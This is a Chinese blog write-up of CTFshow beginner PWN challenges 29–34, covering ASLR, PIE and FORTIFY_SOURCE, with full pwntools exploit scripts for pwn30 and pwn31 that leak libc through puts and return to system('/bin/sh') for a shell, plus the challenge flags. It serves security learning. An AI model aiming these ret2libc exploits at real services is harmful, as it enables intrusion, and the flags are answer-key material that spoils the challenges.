CTFSHOW-PWN入门-前置基础(29-34)

于 2024-08-03 10:53:40 发布
阅读量1.6k 收藏 37
点赞数 48
分类专栏: CTF PWN 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2402_84585385/article/details/140887113
版权
CTF 同时被 2 个专栏收录
5 篇文章 0 订阅
订阅专栏
PWN
5 篇文章 0 订阅
订阅专栏

目录

pwn29

QQ20240802-205852

根据题目提示,修改ASLR参数值即可得到flag

sysctl -w kernel.randomize_va_space=2

QQ20240802-210110

flag:ctfshow{Address_Space_Layout_Randomization&&Position-Independent_Executable_1s_C0000000000l!}

pwn30

QQ20240802-214528

首先用checksec查看文件信息,32位程序,Canary和PIE保护没有开启,NX保护开启

QQ20240802-214503

IDA静态分析,ctfshow函数中的read函数存在栈溢出

QQ20240802-214059

QQ20240802-214109

QQ20240802-214344

这道题没有给后门,也没有system函数,但是plt表中有puts函数,所以使用pwn25题目的ret2lib方式来打通这题。

from pwn import *
from LibcSearcher import *

context(arch='i386',os='linux',log_level='debug')
elf = ELF('./pwn')
p = remote("pwn.challenge.ctf.show",28201)

puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
main_addr = elf.symbols['main']
payload0 = b'a' * 140 + p32(puts_plt)+p32(main_addr)+p32(puts_got)
p.sendline(payload0)

puts_addr = u32(p.recv(4))
print(hex(puts_addr))

libc = LibcSearcher('puts', puts_addr)
libc_base = puts_addr - libc.dump('puts')
system_addr = libc_base + libc.dump('system')
binsh_addr = libc_base + libc.dump('str_bin_sh')
payload = b'a' * 140 + p32(system_addr) + b'a'*4 + p32(binsh_addr)

p.sendline(payload)
p.interactive()

getshell,拿到flag

QQ20240802-214758

flag:ctfshow{29bc928c-5f51-413b-b3c6-bf13d823701b}

pwn31

QQ20240802-214830

首先用checksec查看文件信息,32位程序,Canary保护没有开启,NX和PIE保护开启

QQ20240802-215308

代码跟上题一样,ctfshow函数中的read函数存在栈溢出,但是本题开启了PIE,开启了地址随机化,就不能使用上题的利用方法了。

QQ20240802-221649

QQ20240802-221708

QQ20240802-222417

观察源代码发现printf函数输出了main函数的地址,我们用输出的地址减去main函数的地址就得到了偏移量,然后再用其他函数的地址加上偏移量,就能知道函数在内存中的地址了。进而我们可以利用puts函数输出got表中puts函数的地址,利用LibcSearcher模块得到puts函数在libc中的偏移,然后就能得到system函数和/bin/sh的地址了,最终拿到shell,得到flag。

QQ20240802-222759

先计算栈偏移量

cyclic 200

cyclic -l 0x6261616b

偏移量为140

QQ20240802-223701

QQ20240802-223721

得到真实的main函数地址,0x5656e652

from pwn import *

context(arch='i386',os='linux',log_level='debug')
p = remote("pwn.challenge.ctf.show",28249)

main_real_addr = int(p.recv().strip(),16)
print(hex(main_real_addr))

QQ20240802-224447

用真实的main函数地址减去程序中的main函数地址,就能得到函数在内存中的偏移量了。然后用got表中puts函数的地址泄露出puts函数真实的地址。这里有一个需要注意,在ctfshow函数中,函数的最后有一个mov ebx,DWORD PTR [ebp-0x4],我们要将这个ebx恢复而不是进行覆盖,ebx的长度为4个长度,还差4个长度用4个a补齐。而ebx是通过__x86.get_pc_thunk.ax得来的,它的意义就是为了获取下一条指令的地址。将地址赋值给ebx,然后加上偏移,得到当前got表的地址,并作为后续操作的基地址。got表地址为0x1fc0。

QQ20240802-225844

QQ20240802-230445

from pwn import *

context(arch='i386',os='linux',log_level='debug')
p = remote("pwn.challenge.ctf.show",28249)
elf = ELF("./pwn")

main_real_addr = int(p.recv().strip(),16)
print(hex(main_real_addr))

main_addr = elf.symbols['main']
base_addr = main_real_addr - main_addr
puts_plt = base_addr + elf.symbols['puts']
puts_got = base_addr + elf.got['puts']
ctfshow_addr = base_addr + elf.symbols['ctfshow']
ebx = base_addr + 0x1fc0
payload0 = b'a' * 132 + p32(ebx) + b'a' * 4 + p32(puts_plt) + p32(main_real_addr) + p32(puts_got)
p.send(payload0)
puts_addr = u32(p.recv(4))
print(hex(puts_addr))

最后通过libc找system,/bin/sh

完整exp:

from pwn import *
from LibcSearcher import *

context(arch='i386',os='linux',log_level='debug')
p = remote("pwn.challenge.ctf.show",28249)
elf = ELF("./pwn")

main_real_addr = int(p.recv().strip(),16)
print(hex(main_real_addr))

main_addr = elf.symbols['main']
base_addr = main_real_addr - main_addr
puts_plt = base_addr + elf.symbols['puts']
puts_got = base_addr + elf.got['puts']
ctfshow_addr = base_addr + elf.symbols['ctfshow']
ebx = base_addr + 0x1fc0
payload0 = b'a' * 132 + p32(ebx) + b'a' * 4 + p32(puts_plt) + p32(main_real_addr) + p32(puts_got)
p.send(payload0)
puts_addr = u32(p.recv(4))
print(hex(puts_addr))

libc = LibcSearcher("puts",puts_addr)
libc_base = puts_addr - libc.dump('puts')
system_addr = libc_base + libc.dump("system")
binsh_addr = libc_base + libc.dump("str_bin_sh")
payload = b'a' * 140 + p32(system_addr) + p32(ctfshow_addr) + p32(binsh_addr)
p.send(payload)
p.interactive()

getshell

QQ20240802-231229

flag:ctfshow{21c62651-701e-438b-a4e7-0224f2bdd530}

pwn32

QQ20240803-102031

gcc -D_FORTIFY_SOURCE=1 仅仅只在编译时进行检查

gcc -D_FORTIFY_SOURCE=2 程序执行时也会进行检查

题目提示禁用了fortify功能,我们先用IDA静态分析一下程序。首先看到Undefined函数,它的功能就是打印flag。而主函数中,第一个printf之前,将v4赋值给buf1,再将CTFshowPWN赋值给buf2,并通过printf打印出来。第二个printf之前,通过memcpy函数将argv[2]的v5个字符赋值给buf1,再通过strcpy函数将argv[1]赋值给buf2,并通过printf打印出来。因为本题没有fortify,所以输入4个参数就可以。

QQ20240803-102011

QQ20240803-101957

ssh连接靶机,./pwnme a a a a,得到flag

QQ20240803-103921

flag:ctfshow{9fb3e965-b4a0-4089-80bd-941ba0f08cfa}

pwn33

QQ20240803-104034

本题代码和上题一样,但是开启了fortify=1,仅仅在编译时检查,所以还是输入4个参数,得到flag

QQ20240803-104302

flag:ctfshow{b5ed92c9-93d3-45cd-8ab9-441f2979b49e}

pwn34

QQ20240803-104539

本题代码发生了略微的变化,开启了更高级别的fortify,更精确的缓冲区溢出检查,把危险函数替换成了安全函数。但做法还是跟之前两题一样,输入4个参数,得到flag。

QQ20240803-104634

ssh连接,得到flag

QQ20240803-104948

flag:ctfshow{d455f8b3-f615-4048-ab83-7aa970426318}

haohao_皓皓
关注
专栏目录
CTFSHOW-PWN入门-前置基础(pwn5-pwn12)
2402_84133101的博客
04-13 422
mov eax,[esi]将esi中的值作为地址,然后将该地址单元的值赋给eax,即找到080490E8地址单元中的值赋给eax。mov ecx,msg将msg的地址赋值给ecx,此时ecx寄存器的值为0x80490E8。mov ecx,msg将msg的地址赋值给ecx,此时ecx寄存器的值为0x80490E8。mov ecx,msg将msg的地址赋值给ecx,此时ecx寄存器的值为0x80490E8。mov eax,[ecx]将ecx寄存器的值作为地址,将该地址单元中的值赋给eax。
CTFshow-PWN入门-栈溢出pwn35~pwn40
weixin_63576152的博客
08-22 1265
本文主要详解CTFshow中pwn入门系列的栈溢出模块的前6题所用工具:linux环境下的虚拟机、IDA Pro、exeinfope参考文章:以下操作中小编用的都是自己的kali环境。
CTFshow-pwn入门-前置基础pwn29-pwn31
T1ngSh0w的博客
06-21 1667
CTFshow-pwn入门-前置基础pwn29-pwn31(绕过PIE-pwn31)
CTFshow-PWN入门-前置基础-全篇
weixin_63576152的博客
07-31 3869
本文主要详解CTFshow中pwn入门系列的前置基础模块,共30道题所用工具:linux环境下的虚拟机、IDA Pro、exeinfope的博客以下操作中小编用的都是自己的kali环境。
CTFshow-pwn入门-Test_your_nc
T1ngSh0w的博客
06-17 2040
ctfshow-pwn入门-test_your_nc-pwn0-pwn4
CTFshow-pwn入门-前置基础pwn13-pwn19
T1ngSh0w的博客
06-17 1987
ctfshow pwn入门-前置基础pwn13-pwn19
CTFSHOW-PWN入门-Test_your_nc
最新发布
2402_84133101的博客
04-13 405
根据第12行代码得知,变量s1的值为CTFshowPWN,第15行代码输入变量s2的值,比较s1和s2的值,相等就执行execve_func函数。系统提示3秒后关闭,但是实际上不会,cd到根目录,在根目录上发现了flag。根据系统提示,使用输入cat /ctfshow_flag即可看到flag。system为后门函数,也看到了cat /ctfshow_flag。这题nc连接上之后没有什么发现,下载附件,使用IDA查看一番。输入CTFshowPWN,即可拿到shell,找到flag。
mqtt-pwn:MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式服务
05-02
MQTT-PWN MQTT是一种机器对机器的连接协议,被设计为一种极其轻量级的发布/订阅消息传递,并已被全球数百万个IoT设备广泛使用。 MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式商店,因为它结合了枚举...
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
CTFshow-pwn入门-栈溢出pwn49(静态链接pwn-mprotect函数的应用)
T1ngSh0w的博客
07-08 1470
ctfshow-pwn入门-栈溢出pwn49-mprotect函数静态链接pwn的应用
ctfshow pwn
zip471642048的博客
06-04 498
ctfshow pwn系列
CTFshow-pwn入门-前置基础pwn32-pwn34
T1ngSh0w的博客
06-21 731
CTFshow-pwn入门-前置基础pwn32-pwn34
CTFshow-pwn入门-前置基础pwn26-pwn28
T1ngSh0w的博客
06-20 1019
CTFshow-pwn入门-pwn26-pwn28
CTFshow PWN入门 pwn02
question55的博客
09-15 611
ctf pwn 栈溢出漏洞 ctf入门 ctfshow
CTFshow-pwn入门-栈溢出pwn43-pwn44
T1ngSh0w的博客
12-27 1368
CTFshow-pwn入门-栈溢出pwn43-pwn44
CTFshow-pwn入门-前置基础pwn5 - pwn12
T1ngSh0w的博客
06-17 1285
CTFshow-pwn入门-前置基础-pwn5-pwn12
CTFshow-pwn入门-栈溢出pwn35-pwn36
T1ngSh0w的博客
06-21 1029
CTFshow-pwn入门-栈溢出pwn35-pwn36
CTFshow-pwn入门-栈溢出pwn37-pwn38
T1ngSh0w的博客
12-27 1191
CTFshow pwn入门栈溢出pwn37-38
mqtt-pwn安装
09-20
安装mqtt-pwn的步骤如下: 1. 克隆mqtt-pwn仓库:使用命令`git clone https://github.com/akamai-threat-research/mqtt-pwn.git`将mqtt-pwn仓库克隆到本地。 2. 进入mqtt-pwn目录:使用命令`cd mqtt-pwn`进入mqtt-pwn所在的目录。 3. 启动mqtt-pwn容器:使用命令`sudo docker-compose up --build --detach`启动mqtt-pwn容器。 另外,您还需要安装以下软件: 1. 安装pwntools:使用命令`python3 -m pip install --upgrade pwntools`来安装并更新pwntools。 2. 安装mosquitto程序和mosquitto-clients客户端程序:使用命令`sudo apt install mosquitto`和`sudo apt install mosquitto-clients`来安装mosquitto程序和mosquitto-clients客户端程序。 请注意,以上步骤假设您已经在Linux环境下进行操作。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值